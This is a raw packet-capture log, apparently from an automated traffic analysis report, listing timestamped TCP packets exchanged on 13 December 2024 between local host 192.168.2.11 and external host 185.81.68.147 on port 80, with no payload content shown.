                                                                                                                                                                                                Dec 13, 2024 08:18:56.604351997 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605372906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605390072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605407000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605422020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605426073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605457067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605700016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605760098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605776072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605793953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605932951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.605993986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606566906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606654882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606669903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606693029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606781006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606796980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.606813908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607512951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607564926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607608080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607624054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607640982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607654095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607732058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.607781887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608614922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608819962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608858109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608871937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608889103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608905077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.608932018 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609364986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609406948 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609436035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609452963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609486103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609519958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609536886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.609585047 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610382080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610399008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610415936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610441923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610466003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610482931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.610498905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611232996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611279011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611288071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611304998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611339092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611409903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611427069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.611475945 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612143993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612195015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612211943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612231016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612330914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612346888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.612365961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613114119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613157988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613267899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613315105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613329887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613348007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613476992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613496065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.613509893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614195108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614222050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614238024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614239931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614284039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614391088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614408016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.614450932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615089893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615195990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615211964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615235090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615334034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615351915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.615370989 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616038084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616084099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616101027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616117001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616151094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616271019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616287947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616339922 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.616954088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617022038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617057085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617075920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617201090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617216110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617232084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617857933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617901087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617919922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617937088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.617975950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618060112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618076086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618122101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618761063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618818045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618833065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618854046 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618949890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618968010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.618987083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619620085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619664907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619685888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619702101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619736910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619826078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619842052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.619904041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620486021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620547056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620563030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620584965 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620671034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620686054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.620713949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621323109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621362925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621386051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621401072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621478081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621521950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621539116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.621577024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622082949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622153997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622183084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622416019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622481108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622498989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622520924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622622013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622637987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622652054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622663021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.622703075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623356104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623421907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623436928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623460054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623583078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623599052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623614073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623619080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.623652935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624295950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624370098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624386072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624411106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624495983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624512911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624526978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624532938 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.624576092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625277996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625353098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625368118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625392914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625464916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625499964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625505924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625521898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.625569105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626127005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626193047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626228094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626327038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626342058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626358032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626380920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626436949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.626501083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627089024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627127886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627141953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627163887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627279043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627294064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627309084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627321005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.627357960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628036022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628084898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628099918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628133059 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628205061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628220081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628235102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628237963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628271103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628838062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628907919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628922939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.628940105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629024982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629040003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629055977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629057884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629087925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629717112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629764080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629779100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629797935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629863977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.629909992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630291939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630359888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630374908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630395889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630487919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630501986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630517006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630522966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.630567074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631194115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631267071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631282091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631304979 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631382942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631397963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631412983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631417990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.631458044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632009029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632076979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632091999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632110119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632194996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632230043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632278919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632294893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632327080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632883072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632925987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632941008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.632965088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633158922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633184910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633197069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633203030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633234978 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633738041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633805037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633821011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633838892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633959055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633975983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633991003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.633996010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634035110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634605885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634675026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634691000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634711981 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634799957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634814978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634831905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634835958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.634881020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635437965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635493040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635508060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635526896 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635605097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635642052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635652065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635668993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.635715008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636280060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.636327982 CET8049726185.81.68.147192.168.2.11
